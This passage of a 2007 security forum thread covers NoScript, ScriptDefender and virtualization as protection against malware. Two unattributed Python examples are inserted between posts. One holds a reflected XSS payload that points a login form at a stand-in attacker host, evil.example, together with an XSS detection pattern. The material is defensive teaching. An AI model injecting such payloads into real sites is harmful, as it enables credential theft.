May 12th, 2007, 06:08 PM
-{ Quote: "I'm suggesting that against browser-based attacks, the countermeasures are:
- NoScript (anti-XSS features)." }-The problem here is that you could not log in to your account with javascript disabled. (assuming your log in page uses javascript)
regards,
-rich
EASTER.2010
May 12th, 2007, 06:12 PM
-{ Quote: "- NoScript (anti-XSS features)." }-
This is what makes Wilder's so very valuable for us, the generosity in sharing results either from real-world experiences or even articles.
Thanks for the mention of No-Script, i have to consider it and will likely test it myself.
lucas1985
May 12th, 2007, 06:12 PM
Anti-XSS features are for whitelisted sites ;) Whitelisted sites can execute Javascript.
Firekeeper (discussion between developers of Adblock Plus and NoScript) (http://www.wilderssecurity.com/showthread.php?t=168176)
Link (http://www.wilderssecurity.com/showpost.php?p=963722&postcount=35)
-{ Quote: "NoScript can't currently protect you against XSS attacks targeted to a whitelisted site." }-
-{ Quote: "If the compromised site is not on your whitelist, XSS attacks will fail.
That said, I'm also actively developing and testing prevention measures for notable XSS vectors, and I'll progressively implement them into NoScript." }-
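The limitation quoted above ("NoScript can't currently protect you against XSS attacks targeted to a whitelisted site") and Rmus's earlier description of a compromised login page sending the submitted ID and password to the attacker can be worked through in a few lines. This is an added example for this thread, not NoScript's code: a simplified per-origin whitelist, a deliberately vulnerable search page that reflects a query parameter, and the request-side check an anti-XSS filter applies to cross-site requests. The hosts bank.example and evil.example, the allow list, the payload and the page are all constructed.

```python
"""Why a per-site script whitelist does not stop XSS on a whitelisted site.

Added example for this thread; a simplified model, not NoScript's code.  A
whitelist decides by origin: inline scripts are governed by the origin of the
page they sit in, external ones by the origin of their src.  A reflected XSS
payload lands as an inline script in a page served by the trusted site, so the
whitelist lets it run.  All URLs, hosts and the search page are constructed.
"""
import html
import re
from urllib.parse import parse_qs, quote, urlparse

# Constructed allow list: the sites this user has whitelisted.
WHITELIST = {'https://bank.example', 'https://www.wilderssecurity.com'}

LEGIT_URL = 'https://bank.example/search?q=mortgage'
# Reflected payload that points the login form at the attacker: the
# "click Submit and it goes to the thief" case described in the thread.
PAYLOAD = '<script>document.forms[0].action="https://evil.example/"</script>'
ATTACK_URL = 'https://bank.example/search?q=' + quote(PAYLOAD, safe='')

SCRIPT_RE = re.compile(r'<script([^>]*)>(.*?)</script>', re.I | re.S)
SRC_RE = re.compile(r'\bsrc="([^"]*)"', re.I)
SUSPICIOUS = re.compile(r'<\s*script|javascript:|\bon\w+\s*=', re.I)


def origin(url):
    """scheme://host in lower case; the port is ignored in this model (assumption)."""
    p = urlparse(url)
    return f'{p.scheme}://{p.hostname}'.lower() if p.hostname else ''


def script_allowed(page_url, script_src, whitelist):
    """Inline script (script_src None) runs if the page's origin is whitelisted;
    an external script runs if the origin of its src is whitelisted."""
    governing = origin(page_url) if script_src is None else origin(script_src)
    return governing in whitelist


def scripts_in(html_text):
    """(src, body) for every <script> element, as the browser would find them."""
    found = []
    for attrs, body in SCRIPT_RE.findall(html_text):
        m = SRC_RE.search(attrs)
        found.append((m.group(1) if m else None, body))
    return found


def _query_param(page_url, name):
    return parse_qs(urlparse(page_url).query).get(name, [''])[0]


def render_search_vulnerable(page_url):
    """Deliberately vulnerable: reflects q into the page without escaping."""
    q = _query_param(page_url, 'q')
    return ('<html><body><script src="https://bank.example/app.js"></script>'
            '<form action="/login"><input name="pw"></form>'
            f'<p>Results for: {q}</p></body></html>')


def render_search_fixed(page_url):
    """Same page with the reflected value HTML-escaped; the payload is now text."""
    q = html.escape(_query_param(page_url, 'q'), quote=True)
    return ('<html><body><script src="https://bank.example/app.js"></script>'
            '<form action="/login"><input name="pw"></form>'
            f'<p>Results for: {q}</p></body></html>')


def scripts_that_would_run(page_url, renderer, whitelist):
    """Render the page, collect its scripts, keep those the whitelist permits."""
    page = renderer(page_url)
    return [(src, body) for src, body in scripts_in(page)
            if script_allowed(page_url, src, whitelist)]


def reflected_xss_suspect(request_url, referer):
    """Request-side check of the kind an anti-XSS filter applies before the
    trusted site ever sees the request: a cross-site navigation whose query
    parameters carry script-like content.  Same-site requests are not
    inspected, so this complements output escaping rather than replacing it."""
    cross_site = referer is None or origin(referer) != origin(request_url)
    params = parse_qs(urlparse(request_url).query)
    return cross_site and any(SUSPICIOUS.search(v) for vals in params.values() for v in vals)


if __name__ == '__main__':
    print('legit page runs:', scripts_that_would_run(LEGIT_URL, render_search_vulnerable, WHITELIST))
    print('attacked page runs:', scripts_that_would_run(ATTACK_URL, render_search_vulnerable, WHITELIST))
    print('fixed page runs:', scripts_that_would_run(ATTACK_URL, render_search_fixed, WHITELIST))
    print('filter flags attack link:', reflected_xss_suspect(ATTACK_URL, 'https://evil.example/mail'))
```

The policy lets the injected inline script run because it sits in a page from the whitelisted origin; the whitelist cannot tell it apart from the site's own code, and neither can a sandbox, since the script only drives normal HTTPS traffic. The request filter catches the cross-site navigation but not a same-site one, which is why the output escaping in render_search_fixed is the fix that does not depend on the client.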
Rmus
May 12th, 2007, 06:51 PM
-{ Quote: "Anti-XSS features are for whitelisted sites ;) Whitelisted sites can execute Javascript." }-Sorry, Lucas, I completely forgot about NoScript :-[
Here is another link to follow:
http://www.castlecops.com/p930581-NoScript_1_1_4_8_is_out.html
regards,
-rich
lucas1985
May 12th, 2007, 07:08 PM
-{ Quote: "Sorry, Lucas, I completely forgot about NoScript :-[ " }-
You're excused ;D
ErikAlbert
May 12th, 2007, 08:49 PM
OK Guys. I installed ScriptDefender, which protects me against these script extensions :
.VBS .VBE .JS .JSE .HTA .WSF .WSH .SHS .SHB
Anymore extensions ?
And thanks for expanding my security set with another execution-killer. ;D
PS: I could run the test.vbs without warning and that is not a good sign.
Problem fixed.
EASTER.2010
May 12th, 2007, 08:58 PM
-{ Quote: "OK Guys. I installed ScriptDefender, which protects me against these script extensions :
.VBS .VBE .JS .JSE .HTA .WSF .WSH .SHS .SHB
Anymore extensions ?
And thanks for expanding my security set with another execution-killer. ;D
PS: I could run the test.vbs without warning and that is not a good sign.
Problem fixed." }-
Erik, you have done your system a very huge favor indeed, but I do spot one missing, and it regards your system registry: .REG. I know ScriptSentry covers that one too, dunno about ScriptDefender though.
ErikAlbert
May 12th, 2007, 09:06 PM
-{ Quote: "Erik, you have done your system a very huge favor indeed but i do spot one missing, and it regards your system registry. .REG I know ScriptSentry covers that one too, dunno about ScriptDefender though." }-
Done and thanks. I will put all these extensions in my installation file of ScriptDefender to remember them in case I reinstall from scratch.
Script Defender v1.02
http://www.analogx.com/CONTENTS/download/system/sdefend.htm
.HTA, .JS, .JSE, .REG, .SHB, .SHS, .VBE, .VBS, .WSF, .WSH in alphabetical order. :)
Rmus
May 12th, 2007, 09:47 PM
-{ Quote: "OK Guys. I installed ScriptDefender, which protect me against these script extensions :" }-Hello ErikAlbert,
As you know, this program modifies your Registry, so be sure and have a backup of your Registry,
and if you decide to uninstall, follow their procedures exactly.
See this old thread:
http://www.wilderssecurity.com/showthread.php?t=101823
regards,
-rich
ErikAlbert
May 12th, 2007, 10:06 PM
-{ Quote: "As you know, this program modifies your Registry, so be sure and have a backup of your Registry,
" }-
I don't backup my registry, because it is included in my freeze storage, my archived on-line snapshot and also imaged.
That is 3 x backup.
Rmus
May 12th, 2007, 10:12 PM
-{ Quote: "I don't backup my registry," }-OK, my statement should have read: in case of a mishap, be sure you can revert back to a previous Registry from before the installation of SD :)
regards,
-rich
ErikAlbert
May 12th, 2007, 10:23 PM
-{ Quote: "Are you telling us, that you first heard of Script Defender (http://www.analogx.com/CONTENTS/download/system/sdefend.htm) at 4:02PM, and at 8:49PM, you installed it and it is now part of your freeze snap? (those times are my local time)
You did notice that program was "Last updated on Saturday, December 22, 2001 11:53:52 PM PST".
Mike" }-
So what ? It seems to work. Are you checking on me ? We are the good guys remember ?
ErikAlbert
May 12th, 2007, 10:38 PM
-{ Quote: "I assume "So what?" is about the age?
I thought you tested software for a very long time before it was moved into your freeze snap.
I am just so surprised you almost instantly found it to be good, that's all.
Mike" }-
This product has been known for quite some time and is used by many members. So what should the problem be? My MS Office is more than 7 years old and it still works.
lucas1985
May 13th, 2007, 12:00 AM
One difference between AE and SD is that AE alerts you and takes the decision for you. SD only alerts you and the decision has to be made by you.
ErikAlbert
May 13th, 2007, 01:47 AM
-{ Quote: "One difference between AE and SD is that AE alerts you and takes the decision for you. SD only alerts you and the decision has to be made by you." }-
Yes I noticed. AE gives you just a warning without decision and SD gives you a warning with execute or abort.
I'm still not convinced I need SD, because I still don't have a list of 80+ executables, verified by AE. I asked Faronics for such a list, but they didn't give it to me with a cheap excuse. On their website they only mention 9 of 80+, so I don't know the rest.
Getting straight answers nowadays seems to be very difficult, even when you ask the RIGHT people.
EASTER.2010
May 13th, 2007, 03:07 AM
Don't worry about it Erik. I still use FileMapp byBB, which is by far more of a relic than ScriptDefender, but I'll tell you what: it was THE ONLY program that registered that a "hidden" file was released in System32 before it went stealth when I tested a rootkit on my system.
Otherwise, no program would have ever even known of its existence, including some popular ARKs.
Latest is not always the greatest, and more often than not, something which might be considered outdated by most can still carry the mail, if you catch my drift. ;) I still use Kerio 2.15 and can't even get a nibble like a port scan.
ErikAlbert
May 13th, 2007, 08:43 AM
Logical question regarding Script Defender :
If I can add the file extension .REG, I assume I can add ANY file extension in Script Defender, not only script file extensions.
Which would mean that Script Defender is more like an Extension Defender. Am I right about this ?
Thank you in advance.
PS: SD has a dumb uninstaller, but that is common for most softwares.
lucas1985
May 13th, 2007, 01:50 PM
Yes, you can add any extension and SD will intercept it.
When you install your favourite media player, you associate it with the .mp3, .wav, .avi, .wmv extensions. SD does the same with script extensions. Very simple, eh?
You only need SD due to AE's lack of script interception.
Prior to uninstalling, you must reset the associations.
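The dispatch mechanism Rmus described earlier (a double-clicked .js is interpreted by the OS, which routes it through the HKCR\JSFile\Shell\Open\Command value rather than the browser) and the point just above, that Script Defender works by taking over those associations and must hand them back before uninstall, can be worked through in code. This is an added example for this thread, not code from ScriptSentry, Script Defender or Faronics; it runs offline over a constructed .reg-style export. The .js/.vbs ProgIDs and the WScript.exe default commands in that export are assumptions; the ScriptSentry command line is the one shown in the thread.

```python
"""Model of Windows file-type dispatch and script interception.

Added example for this thread; not code from ScriptSentry, Script Defender or
Faronics.  The shell resolves a double-click as
    extension  ->  ProgID          (default value of HKCR\\.js)
    ProgID     ->  command line    (HKCR\\<ProgID>\\Shell\\Open\\Command)
and a script interceptor works by rewriting that command line so its own
executable receives "%1" (the file) before the real script host does.
Everything here runs offline over a constructed .reg-style export; on a real
machine the same keys are read with `reg query` or Python's winreg module.
"""
import re

# Constructed HKCR export of the pre-interception state.  The .js/.vbs ProgIDs
# and the WScript.exe commands are assumptions about a default install.
HKCR_EXPORT = r'''
[HKEY_CLASSES_ROOT\.js]
@="JSFile"

[HKEY_CLASSES_ROOT\JSFile\Shell\Open\Command]
@="C:\\Windows\\System32\\WScript.exe \"%1\" %*"

[HKEY_CLASSES_ROOT\.vbs]
@="VBSFile"

[HKEY_CLASSES_ROOT\VBSFile\Shell\Open\Command]
@="C:\\Windows\\System32\\WScript.exe \"%1\" %*"

[HKEY_CLASSES_ROOT\.txt]
@="txtfile"

[HKEY_CLASSES_ROOT\txtfile\shell\open\command]
@="%SystemRoot%\\system32\\NOTEPAD.EXE %1"
'''

# Extensions Script Defender was configured with in the thread, and the
# ScriptSentry command line the thread shows.
SCRIPT_EXTS = ['.hta', '.js', '.jse', '.reg', '.shb', '.shs', '.vbe', '.vbs', '.wsf', '.wsh']
INTERCEPTOR = 'C:\\Program Files\\Script Sentry\\ScriptSentry.exe "%1" %*'

_KEY_RE = re.compile(r'^\[(.+)\]$')
_VALUE_RE = re.compile(r'^(@|"(?:[^"\\]|\\.)*")=(.*)$')


def _unescape(s):
    """.reg string data escapes backslash and double quote with a backslash."""
    return re.sub(r'\\(.)', r'\1', s)


def parse_reg(text):
    """Parse the [key] / @="data" / "name"="data" subset of the .reg format into
    {key: {value_name: data}}; keys are lower-cased because the registry is
    case-insensitive.  The default value is stored under the empty name."""
    reg, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(';'):
            continue
        m = _KEY_RE.match(line)
        if m:
            current = m.group(1).lower()
            reg.setdefault(current, {})
            continue
        m = _VALUE_RE.match(line)
        if m and current is not None:
            name = '' if m.group(1) == '@' else _unescape(m.group(1)[1:-1])
            data = m.group(2).strip()
            if len(data) >= 2 and data[0] == '"' and data[-1] == '"':
                data = _unescape(data[1:-1])
            reg[current][name] = data
    return reg


def resolve_open_command(reg, filename):
    """Mimic the shell's double-click lookup and return the command line Windows
    would run, or None when the extension has no registered handler (the shell
    then shows 'Open with' instead of running anything)."""
    dot = filename.rfind('.')
    if dot < 0:
        return None
    ext = filename[dot:].lower()
    progid = reg.get(f'hkey_classes_root\\{ext}', {}).get('')
    if not progid:
        return None
    cmd = reg.get(f'hkey_classes_root\\{progid.lower()}\\shell\\open\\command', {}).get('')
    if not cmd:
        return None
    return cmd.replace('%1', filename).replace('%*', '').rstrip()


def install_interceptor(reg, exts, interceptor_cmd):
    """What a script blocker does at install time: point every registered script
    extension's Open command at the interceptor.  Returns the original commands
    so they can be restored; extensions with no ProgID are skipped."""
    backup = {}
    for ext in exts:
        progid = reg.get(f'hkey_classes_root\\{ext}', {}).get('')
        if not progid:
            continue
        cmd_key = f'hkey_classes_root\\{progid.lower()}\\shell\\open\\command'
        backup[cmd_key] = reg.setdefault(cmd_key, {}).get('')
        reg[cmd_key][''] = interceptor_cmd
    return backup


def restore_associations(reg, backup):
    """What a correct uninstaller has to do before the interceptor's files go:
    put the saved commands back (or drop the value if there was none), otherwise
    every double-click on a script keeps pointing at an executable that no
    longer exists."""
    for cmd_key, original in backup.items():
        if original is None:
            reg[cmd_key].pop('', None)
        else:
            reg[cmd_key][''] = original


if __name__ == '__main__':
    reg = parse_reg(HKCR_EXPORT)
    print('before:     ', resolve_open_command(reg, r'C:\cache\evil.js'))
    saved = install_interceptor(reg, SCRIPT_EXTS, INTERCEPTOR)
    print('intercepted:', resolve_open_command(reg, r'C:\cache\evil.js'))
    restore_associations(reg, saved)
    print('restored:   ', resolve_open_command(reg, r'C:\cache\evil.js'))
```

On a live Windows machine the same lookup is `reg query HKCR\.js /ve` followed by `reg query HKCR\JSFile\Shell\Open\Command /ve`. A .js fetched by the browser never goes through this path at all, which is the point made earlier in the thread; and an uninstaller that removes the interceptor's executable without doing the equivalent of restore_associations() leaves every script extension pointing at a file that is gone.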
ErikAlbert
May 13th, 2007, 01:55 PM
-{ Quote: "Prior to uninstalling, you must reset the associations." }-
I know, but I don't understand why I have to remove intercepts, the programmers of SD should have programmed this in the uninstaller of SD. :(
lucas1985
May 13th, 2007, 02:04 PM
I'd call it a "functional bug".
For example, if you're going to uninstall SpywareBlaster, you must disable the protection first.
I'd be concerned about these "bugs" in paid software. SD and SWB are freebies (and very good ones), so I can't complain.
Mrkvonic
May 14th, 2007, 01:11 AM
Hello,
To answer the original question:
Programs running in virtual environment can do only what the environment permits them. If the virtual environment allows its contents to modify files on the host system - then they will - but that's kind of contrary to virtualization - as opposed to physicalization.
Mrk
ErikAlbert
May 14th, 2007, 02:37 AM
-{ Quote: "Hello,
To answer the original question:
Programs running in virtual environment can do only what the environment permits them. If the virtual environment allows its contents to modify files on the host system - then they will - but that's kind of contrary to virtualization - as opposed to physicalization.
Mrk" }-
The purpose of virtualization is that malware installs itself in an environment where it can do NOTHING, not even send data over the internet.
If the developer of the virtualization software didn't succeed in doing this, then his software doesn't work properly and needs to be corrected.
Virtualization is supposed to work like that and I don't want anything else, otherwise I'd be better off working in a real environment.
I understand that it isn't easy, but that's the ART of programming and there are a lot of differences between programmers, from very bad to very brilliant. :)
Rmus
May 14th, 2007, 03:01 AM
-{ Quote: "The purpose of virtualization is, ...not even sending data over the internet." }-If that were so, then you could not surf the internet, because to connect to a web site, the browser has to send out data (DNS request, your IP address).
Or are you thinking of something else?
regards,
-rich
Mrkvonic
May 14th, 2007, 03:07 AM
Hello,
The purpose of virtualization is to create a virtual layer of hardware for programs to run on and use. If this layer permits internet access, then malware installed in it will have internet access.
Example: if you allow NAT for a virtual machine in VMware Server, anything installed in a guest OS will be able to dial out. But if you set the virtual machine to host only, then it will not have this access. Very simple.
Mrk
Huupi
May 14th, 2007, 03:42 AM
-{ Quote: "The purpose of virtualization is that malware installs itself in an environment where it can do NOTHING, not even send data over the internet.
If the developer of the virtualization software didn't succeed in doing this, then his software doesn't work properly and needs to be corrected.
Virtualization is supposed to work like that and I don't want anything else, otherwise I'd be better off working in a real environment.
I understand that it isn't easy, but that's the ART of programming and there are a lot of differences between programmers, from very bad to very brilliant.
:)" }-
Wish I were the virtu developer who could make the thing you wish; I'd become richer than Uncle Bill in no time!!
ErikAlbert
May 14th, 2007, 04:30 AM
-{ Quote: "
Wish I were the virtu developer who could make the thing you wish; I'd become richer than Uncle Bill in no time!!" }-
What looks impossible at first sight, doesn't mean it is impossible, you just have to think LONGER or have better brains than the rest. Never heard of inventions ?
You can't boot into an archived snapshot of FDISR either, according to the manual, but it is possible once you know how FDISR works.
ErikAlbert
May 14th, 2007, 04:44 AM
-{ Quote: "I'd call it a "functional bug".
For example, if you're going to uninstall SpywareBlaster, you must disable the protection first.
I'd be concerned of these "bugs" in paid software. SD and SWB are freebies (and very good ones), so I can't complaint." }-
At work we call this a mistake of an application analyst, but lots of programs are created by programmers only. Programmers aren't analysts and a good analyst/programmer (one person) doesn't exist, they are usually a good analyst or a good programmer but seldom both. They are cheaper for the boss. :)
Huupi
May 14th, 2007, 06:53 AM
-{ Quote: "What looks impossible at first sight, doesn't mean it is impossible, you just have to think LONGER or have better brains than the rest. Never heard of inventions ?
You can't boot in an archived snapshot of FDISR either according the manual, but it is possible once you know how FDISR works." }-
As you stated many times around Wilders, "I never trust any security app" or words alike; in practical implications virtual is no different from the host, and virtual has to be treated like the host system. There is no magical "something in there" that makes the difference, and for sure you protect your virtu like you do the mother system. I also differ in opinion with you that some day, some time in the future, technical advances will lead to total protection; remember the gloomy dudes are also advancing. Maybe the super coders already reside on the dark side; it's all about money and I have no illusions.
solcroft
May 14th, 2007, 07:02 AM
-{ Quote: "The purpose of virtualization is that malware installs itself in an environment where it can do NOTHING, not even send data over the internet.
If the developer of the virtualization software didn't succeed in doing this, then his software doesn't work properly and needs to be corrected.
Virtualization is supposed to work like that and I don't want anything else, otherwise I'd be better off working in a real environment.
I understand that it isn't easy, but that's the ART of programming and there are a lot of differences between programmers, from very bad to very brilliant. :)" }-
I'm sorry, but that's your wish of what virtualization should be like, not what it really should be. Depending on the virtualization software you use, you can tell it to virtualize a network connection, or disable it completely. Virtualization is a very powerful tool whose usage is not limited to malware containment. It wasn't designed specifically to combat malware at all, but due to its operating principles it ends up doing just that very nicely, though I guess you wouldn't know that. ::)
Mrkvonic
May 14th, 2007, 07:49 AM
Hello,
Erik, you quoted me by accident. I did not write that virtu sentence. Huupi did.
Thanks,
Mrk
Pedro
May 14th, 2007, 08:00 AM
:) I noticed that too. I thought i was going nuts!
Franklin
May 14th, 2007, 08:19 AM
Wonder if PowerShadow loads the system into memory like the Returnil Virtual App? Hence some users reporting their systems running faster in PS mode?
-{ Quote: "Returnil Virtual System is a powerful technology that clones a copy of your Windows system into RAM. It is quite simply the most advanced Virtual Partition solution available. Returnil Virtual System protects your computer from harmful viruses, spyware and unwanted programs, preserves your computer settings, and ensures your Internet Privacy. Simply restart your computer to erase all changes.
When the Returnil protection is ON, your Windows system is running on a virtual partition meaning that every single change in the system partition actually takes place in the memory. Therefore all data and modifications will be lost after your system is rebooted. When the Returnil Protection is OFF, you can install or remove any programs, create documents or download your favorite music as you normally do. All changes in the system partition are saved to your real hard drive. By restarting you PC, Returnil will make your system partition identical and fully functional according to the original configurations.
" }-
Returnil Virtual System (http://www.returnilvirtualsystem.com/index_files/returnilvirtualsystem.htm)
Rmus
May 14th, 2007, 11:01 AM
-{ Quote: "Wonder if PowerShadow loads the system into memory like the Returnil Virtual App? Hence some users reporting their systems running faster in PS mode?" }-The precursors to current virtual technology were the various RAM disk drivers. People would work in a RAM disk because of the speed. One of my programming friends compiled in a RAM disk, for example. On bootup you would allocate a RAM disk (virtual), and it would go away on the next bootup.
A very innovative product was vRamDir, which I used for many years in the mid '90s. Its difference was that you were not limited to the normal 32MB RAM disk size; rather, you could allocate as much RAM as you wanted, depending upon how much free RAM was available on your system.
In those days (mid '90s) processor speed was not as high as today, and it was like flying to do word processing and graphics in a RAM disk, or virtual directory, in the case of vRamDir.
We never thought of it as protection against malware, because only the directory you specified was loaded into RAM, where today, working on an entirely different principle, the entire partition or system is loaded into RAM, as in the case of Returnil.
I stopped using vRamDir once CPU speed increased to the point where my working in a real environment was fast enough.
I notice that vRamDir is still available - the same file dated from 1996! Designed for Win9x, I doubt it would work on NT systems.
http://www.btsoftware.com/products/vramdir.htm
I still have my install file, although I never use it, but I do remember those days of working in RAM!
regards,
-rich
flinchlock
May 14th, 2007, 11:32 AM
My guess, it does something like the *nix chroot (http://en.wikipedia.org/wiki/Chroot) command.
Under the folder C:\$ISR, there are folders with just a number, ie: 0, 1, 2, etc
Under those number folders is apparently a complete copy of each snapshot.
So, I am guessing it does a "chroot C:\$ISR\2". This fakes out XP to think the partition starts below C:\$ISR\2.
I am also guessing the VSS service keeps the current running system in sync with the appropriate numbered folder.
The Copy/Update command just does a "simple" difference between each number folder to figure out what to keep/change/delete.
What do you think of my goofy idea?
Mike
ErikAlbert
May 14th, 2007, 11:36 AM
-{ Quote: "I'm sorry, but that's your wish of what virtualization should be like, not what it really should be. Depending on the virtualization software you use, you can tell it to virtualize a network connection, or disable it completely. Virtualization is a very powerful tool whose usage is not limited to malware containment. It wasn't designed specifically to combat malware at all, but due to its operating principles it ends up doing just that very nicely, though I guess you wouldn't know that. ::)" }-
I'm used to using imperfect security softwares and not finding what I really want.
That's why I replace my current system partition with a clean, trouble-free and malware-free partition during each reboot and that removes every mistake of my security softwares.
I only need my security softwares to save the period between two reboots as good as possible.
These developers of virtualization softwares would save me a lot of time if they described their softwares in an objective way and told the full truth: what it does and, above all, what it does not do. It would save me a lot of posts as well. :)
Pedro
May 14th, 2007, 11:49 AM
Erik, sometimes we just miss that, but they do write those things:
http://www.vmware.com/solutions/whitepapers.html
See Virtualization Overview for instance.
I've lost track of this thread, so one final sentence:
VMware is not like SandboxIE. They are similar in some aspects, but NOT the same by a long shot.
solcroft
May 14th, 2007, 12:24 PM
-{ Quote: "These developpers of virtualization softwares would save me alot of time, if they described their softwares in an objective way and telling the full truth. What it does and above all what it not does. It would save me alot of posts as well. :)" }-
Well, I guess their description also relies a fair bit on the user knowing what virtualization is in the first place. Are you going to take on antivirus software vendors for not telling you that making your morning coffee is not part of their software's functions?
ErikAlbert
May 14th, 2007, 12:31 PM
-{ Quote: "Well, I guess their description also relies a fair bit on the user knowing what virtualization is in the first place. Are you going to take on antivirus software vendors for not telling you that making your morning coffee is not part of their software's functions?" }-
Instead of praising their software into heaven, they better tell the users what it doesn't do. This has nothing to do with making coffee. I might be less-knowledgeable, but I'm not stupid. :)
solcroft
May 14th, 2007, 12:36 PM
-{ Quote: "In stead of praising their software into heaven, they better tell the users what it doesn't do. This has nothing to do with making coffee. I might be less-knowledgeable, but I'm not stupid. :)" }-
Well, there's a lot that virtualization doesn't do. They could write a bible on what virtualization doesn't do.
My point was simply that some things are too redundant for vendors to mention. It would be nice to provide a Virtualization 101 on their website for users who have no idea what the concept is, but the truth is, I wouldn't be too shocked if they didn't.
ErikAlbert
May 14th, 2007, 12:48 PM
-{ Quote: "Well, there's a lot that virtualization doesn't do. They could write a bible on what virtualization doesn't do." }-
The principle of virtualization is quite simple : trap the malware in an environment where it becomes useless. But it's already clear to me that they didn't succeed in doing this and that's why you have a bible on what virtualization doesn't do. :)
Pedro
May 14th, 2007, 01:00 PM
:ouch: Read the pdf!
Containing malware is a side effect, because of how it operates. Still, how do you figure "they didn't succeed in doing this"?
solcroft
May 14th, 2007, 01:01 PM
-{ Quote: "The principle of virtualization is quite simple : trap the malware in an environment where it becomes useless. But it's already clear to me that they didn't succeed in doing this and that's why you have a bible on what virtualization doesn't do. :)" }-
Wrong. Like I said, virtualization was never designed as an anti-malware tool to begin with. Its creators never said, "Oh, let's invent a new way to safely stop viruses and malware." It was created so that users could have an isolated environment to test and experiment around with, without leaving any permanent effects on the host system. This is useful in a number of ways, and a side-effect of the functions of virtualization was that users could execute malware inside this isolated environment without harming the host system.
So as you can see, your principle of virtualization is dead wrong. The whole concept of it is not as simple as trapping malware.
yeow
May 14th, 2007, 01:09 PM
Hi ErikAlbert,
I didn't know what VM was really about, until I read/listened to these Steve Gibson's articles (quite verbose, but rather entertaining):
Ep 50: Virtual Machine History & Technology
Ep 53: VMWare
http://www.grc.com/SecurityNow.htm
ErikAlbert
May 14th, 2007, 01:34 PM
-{ Quote: "Wrong. Like I said, virtualization was never designed as an anti-malware tool to begin with." }-
That is very clear to me now. In other words softwares like Sandboxie and PowerShadow don't belong in the Anti-Malware forum, I mentioned this several times already, but most members seem to consider them as anti-malware.
Pedro
May 14th, 2007, 02:30 PM
I sensed that question would pop:
-{ Quote: "
I've lost track of this thread, so one final sentence:
VMware is not like SandboxIE. They are similar in some aspects, but NOT the same by a long shot." }-
While we were talking about VMware type of virtualisation, we were not talking about sandboxes that use a form of file system virtualization (something in those lines).
SandboxIE is a security program, just that it is not the answer for everything.
And at what it does, I still have to hear anyone reference malware that evades SandboxIE, ie, installs itself on your system through it.
Same goes for VMware. Concepts exist, but I didn't read anyone say here's trojan_killer_rootkit_bufferoverflow_app.exe that really does evade VMware.
yeow
May 14th, 2007, 02:38 PM
ErikAlbert,
I realized your opening post is actually about Sandboxie & PowerShadow virtualization, though discussion steered to VM on Page 4.
I should have included "Ep 55: Application Sandboxes" in my post above, sorry.
ErikAlbert
May 14th, 2007, 02:50 PM
-{ Quote: "ErikAlbert,
I realized your opening post is actually about Sandboxie & PowerShadow virtualization, though discussion steered to VM on Page 4.
I should have included "Ep 55: Application Sandboxes" in my post above, sorry." }-
It was in fact about all virtualization softwares. I just wanted to know how good they are. The bottom line is, that I don't really need them.
Keeping your harddisk UNCHANGED has nothing to do with security IMO.
FDISR isn't a security software either although it keeps my harddisk also unchanged.
Keeping your harddisk unchanged is a form of recovery, nothing more than that and recovery isn't security.
Pedro
May 14th, 2007, 02:57 PM
-{ Quote: "
Keeping your harddisk UNCHANGED has nothing to do with security IMO.
FDISR isn't a security software either although it keeps my harddisk also unchanged.
Keeping your harddisk unchanged is a form of recovery, nothing more than that and recovery isn't security." }-
FDISR does allow changes. You revert them, yes. I give up.:P
yeow
May 14th, 2007, 03:00 PM
Well, if my parents had to surf the net using IE on their PC, then sandboxie would actually help keep out some nasties. So in that respect it would be considered anti-malware.
ErikAlbert
May 14th, 2007, 03:02 PM
-{ Quote: "FDISR does allow changes. You revert them, yes. I give up.:P" }-
Restoring an IMAGE is also reverting changes, but Image Backup isn't security either. I would also use Image Backup on a computer without internet.
You are confusing security with recovery.
If a burglar breaks my window that has something to do with security.
If I replace the broken window with a new one, that is called recovery.
Pedro
May 14th, 2007, 03:09 PM
-{ Quote: "
You are confusing security with recovery.
" }-
Nope, you are. FDISR reverts changes, SandboxIE prevents them.
Still possible that some things occur, sure. But they are reduced to fewer possibilities. Rootkits for one are not possible.
ErikAlbert
May 14th, 2007, 03:15 PM
-{ Quote: "Well, if my parents had to surf the net using IE on their PC, then sandboxie would actually help keep out some nasties. So in that respect it would be considered anti-malware." }-
Sandboxie isolates the nasties, that's not the problem.
Can the nasties do their evil job, that's the question.
Installation of malware is harmless and increases only the volume of your harddisk, the execution of malware is the real problem, which needs to be stopped.
yeow
May 14th, 2007, 03:32 PM
Let's say during 1 session of surfing the net, the sandboxed IE homepage gets hijacked, some bad registry entries get added etc (I really don't know how malware & sandboxie interact, what's possible or not in that respect).
So everything's back to normal after flushing the sandbox, would sandboxie be considered anti-malware? Since their "evil job" here only lasted 1 session.
ErikAlbert
May 14th, 2007, 03:40 PM
-{ Quote: "Let's say during 1 session of surfing the net, the sandboxed IE homepage gets hijacked, some bad registry entries get added etc (I really don't know how malware & sandboxie interact, what's possible or not in that respect).
So everything's back to normal after flushing the sandbox, would sandboxie be considered anti-malware? Since their "evil job" here only lasted 1 session." }-
Everything is back to normal, which means that the malware was able to do its evil job, but Sandboxie RECOVERED the situation. That's not security, that is recovery.
What happens when a malware is sandboxed and the malware is supposed to steal private info.
Will Sandboxie allow this or not ? That's the crucial question. If Sandboxie allows it, the harm is done and you can't revert that.
Jarmo P
May 14th, 2007, 04:07 PM
Sure it is security if running that malware inside Sandboxie prevents it from wiping out your harddisk contents. What you are talking about is more in my opinion of a privacy protection. The terminology and what it means to anyone of course varies from person to person.
yeow
May 14th, 2007, 04:12 PM
But for that example, IE homepage was hijacked but then it's not. So from my parents' POV it's not hijacked.
Actually I totally understand your stance (recovery vs security). But the privacy bit, I'm not too sure if Sandboxie actually prevents access to them.
Peter2150
May 14th, 2007, 04:12 PM
-{ Quote: "The principle of virtualization is quite simple : trap the malware in an environment where it becomes useless. But it's already clear to me that they didn't succeed in doing this and that's why you have a bible on what virtualization doesn't do. :)" }-
Actually Erik, that is quite true. If you look at VMware's website, very little is said about malware compared to the many other applications. Most of the software you have tried was probably developed and tested on a VM machine. It for example allows a developer to test a new driver, and if it crashes the machine, it doesn't prevent them from doing other things on the host. Lots of applications.
Pete
ErikAlbert
May 14th, 2007, 04:16 PM
-{ Quote: "But for that example, IE homepage was hijacked but then it's not. So from my parents' POV it's not hijacked.
Actually I totally understand your stance (recovery vs security). But the privacy bit, I'm not too sure if Sandboxie actually prevents access to them." }-
Ask Tzuk, the developer of Sandboxie. If he doesn't know, nobody knows.
ErikAlbert
May 14th, 2007, 04:23 PM
